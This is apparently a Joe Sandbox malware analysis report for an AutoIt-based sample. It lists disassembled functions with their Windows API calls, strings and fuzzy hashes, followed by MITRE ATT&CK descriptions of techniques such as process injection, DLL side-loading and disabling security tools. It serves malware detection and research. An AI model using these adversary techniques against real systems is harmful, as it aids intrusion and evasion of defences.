Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 6ae923ba84f76cf89a3b02cd662ee01ac4aaa3c9a34f349f4a11303ba5563bab
Instruction ID: f864db9578d847ac400fbe0e339484432e4037878e0b8733d577a27ad9f603ad
Opcode Fuzzy Hash: 6ae923ba84f76cf89a3b02cd662ee01ac4aaa3c9a34f349f4a11303ba5563bab
Instruction Fuzzy Hash: 7D312C74A013099FDB18CF69C990FEA7BB5FF49300F105169E905AB351D770AA41CF90

Function 00CC38C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CC3956
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CC3961

Strings

Combobox, xrefs: 00CC3923

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: ab23b1f117fe51716f3a1e59b77167b7a3b1a4d0510b013158b7d87ca834adaf
Instruction ID: 2b3d6fbe2f12666fe9f6a156d7c49652bad163c5e4e14081acb349b22cc7986c
Opcode Fuzzy Hash: ab23b1f117fe51716f3a1e59b77167b7a3b1a4d0510b013158b7d87ca834adaf
Instruction Fuzzy Hash: 0A11C8717002497FEF118F54EC81FFB376AEB493A4F108129F968972D0D6719E518760

Function 00CAD54C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00CAD5AB
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00CAD5D4

Strings

<local>, xrefs: 00CAD594

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 7aa56262d9fd5141a404e68cc40d9837b19faf7fb67b67521fb0bfaac4b1e6f8
Instruction ID: dacff75ce08364b8ba98ba99197515ec301c6dcb446277c9416ee47a6f4287a3
Opcode Fuzzy Hash: 7aa56262d9fd5141a404e68cc40d9837b19faf7fb67b67521fb0bfaac4b1e6f8
Instruction Fuzzy Hash: 391173B1A45236B9D7244B668C49FF7BE58EB237ACF00422AB15B93580D6649A40D6F0

Function 00C974A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A

CharUpperBuffW.USER32(?,?,?), ref: 00C974D2
_wcslen.LIBCMT ref: 00C974DE

Strings

STOP, xrefs: 00C974D8, 00C974DD

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 4ea0f942383520a1337f7f4a5d4cf1ebb7bd656f8a743847251449a7ee0d653f
Instruction ID: 172d991976de7ee4daa6091125737ae728044dc5738f20f4b655990d99ea24f6
Opcode Fuzzy Hash: 4ea0f942383520a1337f7f4a5d4cf1ebb7bd656f8a743847251449a7ee0d653f
Instruction Fuzzy Hash: 7D01C432A2512A8ACF519EBDDC489BF77B5AB50314B120A24E83697191EB30DA40D750

Function 00C92558 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A

Part of subcall function 00C944BB: GetClassNameW.USER32(?,?,000000FF), ref: 00C944DE

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C925C6

Strings

ListBox, xrefs: 00C92590
ComboBox, xrefs: 00C92565

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 9ea59ec0121f74daf565ee6687a820e937bfab4a977336a5377ac4398d3d4bc2
Instruction ID: 943f4ea198264825bc7e17cfade2d4ee781b42a034ad4f8953f39b055f37ff31
Opcode Fuzzy Hash: 9ea59ec0121f74daf565ee6687a820e937bfab4a977336a5377ac4398d3d4bc2
Instruction Fuzzy Hash: 6601D875600218BBCF04FBA4CC69EFE77A8EB06350F000A19F872572C2DE359909A750

Function 00C92452 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A

Part of subcall function 00C944BB: GetClassNameW.USER32(?,?,000000FF), ref: 00C944DE

SendMessageW.USER32(?,00000180,00000000,?), ref: 00C924C0

Strings

ListBox, xrefs: 00C9248A
ComboBox, xrefs: 00C9245F

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: b9c5e04a386dfe11f840a51b998d5b9cb04d7d80a924bf856f31e88ab08cf335
Instruction ID: 9e5f1f3672e4f2dfaa6d03a087dc6777f4d4bbebe6365d56e5b4e21bccd42f5e
Opcode Fuzzy Hash: b9c5e04a386dfe11f840a51b998d5b9cb04d7d80a924bf856f31e88ab08cf335
Instruction Fuzzy Hash: 1901A2B1A401087BCF15EBA0C95AFFE77E89B15340F101025B952772C2DA249E08A7B1

Function 00C924D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A

Part of subcall function 00C944BB: GetClassNameW.USER32(?,?,000000FF), ref: 00C944DE

SendMessageW.USER32(?,00000182,?,00000000), ref: 00C92542

Strings

ListBox, xrefs: 00C9250E
ComboBox, xrefs: 00C924E3

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 02dd7bb73a111cce9b7602eef111f8b21cb4181668c6d674e5eb3ac7e3799c58
Instruction ID: 70351b14cc569dbe39d8006fe43bbd912e41b4c01fdab6ee5bffa687505c5f18
Opcode Fuzzy Hash: 02dd7bb73a111cce9b7602eef111f8b21cb4181668c6d674e5eb3ac7e3799c58
Instruction Fuzzy Hash: 880181B1A41108BBCF15E7A4C95AFFF77E89B16340F140025B852B3282EA25DF09A7B1

Function 00C8E96F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00C8E98D
_wcslen.LIBCMT ref: 00C8E9CB

Strings

3, 3, 15, 3, xrefs: 00C8E975

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 15, 3
API String ID: 176396367-1239129305
Opcode ID: 76a9aa791da15ea53e67d15dae182d5df9277957ae285dad8deecf1f0fc09217
Instruction ID: 4af5371a3de376da3568b77c7b8e72e7423c79ba3801a216468d99d136bba032
Opcode Fuzzy Hash: 76a9aa791da15ea53e67d15dae182d5df9277957ae285dad8deecf1f0fc09217
Instruction Fuzzy Hash: DCF0961A60015455CBE1B6B5D889BBD22A4AF88705F2148BAEC09C7150FFA0CEC9A784

Function 00C9138F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C9139D

Strings

AutoIt, xrefs: 00C91391
Error allocating memory., xrefs: 00C91396

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 00598781c061c1f8518e59fe7ced7b1cf4b4d822fcb06e103341d2404a903862
Instruction ID: 93fd4fd1a9fb7f5dd2c27d407037952c8b18b075c58e0b1ad7adad933a4b80a0
Opcode Fuzzy Hash: 00598781c061c1f8518e59fe7ced7b1cf4b4d822fcb06e103341d2404a903862
Instruction Fuzzy Hash: 1BE0DF3A25471827D6143794AC0BF8DBAC48F04B66F20043EFE49998C28AE225C0679E

Function 00C51162 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00C4FAF1: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C51191,?,?,?,00C3100A), ref: 00C4FAF6

IsDebuggerPresent.KERNEL32(?,?,?,00C3100A), ref: 00C51195
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C3100A), ref: 00C511A4

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C5119F

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 588fb4f12f4e8b6f088bdea99f14be5284af380b0bb77581d0473be24074934e
Instruction ID: d98fd82f3328eb09e50a49e6171f25d43f8c5ec780dd9b78aeab97b63f88e61d
Opcode Fuzzy Hash: 588fb4f12f4e8b6f088bdea99f14be5284af380b0bb77581d0473be24074934e
Instruction Fuzzy Hash: 68E06DB0200B108FD7609F28E90874ABBE4EB04305F148A6DED86C2751DBB4D9888BE1

Function 00CA38AA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00CA38C2
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00CA38D7

Strings

aut, xrefs: 00CA38CB

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: f490aa4f17cd14814204857271267b9c3d159ea5b0a5af1cbe32aea345eda107
Instruction ID: fe5418a270c41daf08634825c08649de1065866ee053f77a5287e9a4006ce442
Opcode Fuzzy Hash: f490aa4f17cd14814204857271267b9c3d159ea5b0a5af1cbe32aea345eda107
Instruction Fuzzy Hash: 21D05EB2500328A7DA60A764DC0EFDF7A6CDB44711F0002B1FA5692091DAB0DA85CB90

Function 00C8E3BB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00C8E3BF

Strings

X64, xrefs: 00C8E447
%.3d, xrefs: 00C8E3CA

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 9402a544bb4140d2cd1836bb24acc97fdd410b6ce8c2584dfbe7cb19e408f495
Instruction ID: f59b8f39ab9d33e5d25152f7a142bb343634bcf7a63a6ce46de68bd85f5bea84
Opcode Fuzzy Hash: 9402a544bb4140d2cd1836bb24acc97fdd410b6ce8c2584dfbe7cb19e408f495
Instruction Fuzzy Hash: 72D01261805119E9CBD0A7D28C88DBD737CBB48304F204462FA0BD2010E6249A08A726

Function 00CC29FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CC2A06
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00CC2A19

Part of subcall function 00C9F152: Sleep.KERNEL32 ref: 00C9F1CA

Strings

Shell_TrayWnd, xrefs: 00CC29FF

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 2e730cc78e3c0a7c2a3e228cf415ea5bc9e784336741ecd3e877e093bdc7fc0f
Instruction ID: 59328ecc6143d7a10aab3e5b84e0cdb08b08cf04230d4b475b18852ea1440bb1
Opcode Fuzzy Hash: 2e730cc78e3c0a7c2a3e228cf415ea5bc9e784336741ecd3e877e093bdc7fc0f
Instruction Fuzzy Hash: 0FD01236399315B7E7A4B770EC0FFEA6A549F50B10F200839F34AEA1D0C9E4A841C694

Function 00CC2A30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CC2A46
PostMessageW.USER32(00000000), ref: 00CC2A4D

Part of subcall function 00C9F152: Sleep.KERNEL32 ref: 00C9F1CA

Strings

Shell_TrayWnd, xrefs: 00CC2A3F

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: a4b7a4353c17f6ef9cbd3f8d8a2327e4d495a7bcb454d4d7cb52852429af2b46
Instruction ID: a11ec40c1298f7b98daba0db77543cd8bdf887f9ddedde8d4ff0b2e0ff3d474c
Opcode Fuzzy Hash: a4b7a4353c17f6ef9cbd3f8d8a2327e4d495a7bcb454d4d7cb52852429af2b46
Instruction Fuzzy Hash: E4D0C932385315AAE6A5B770EC0EFDA6A549B54B10F200839B34AEA1D0C9A4A841C694

Function 00C6C21D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00C6C2B3
GetLastError.KERNEL32 ref: 00C6C2C1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C6C31C

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: bf7b7b73426f144389752b820534d047e8aad972227d143116ed183a320d24a2
Instruction ID: 79259f496042b173dd69e6638080f28b82d8c5e164bf1cd586f2b836822f6d8f
Opcode Fuzzy Hash: bf7b7b73426f144389752b820534d047e8aad972227d143116ed183a320d24a2
Instruction Fuzzy Hash: 5441B431600245AFDB318F65C8C4BFE7BA5AF42360F158179E8E9972B1DB309E51DB60

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

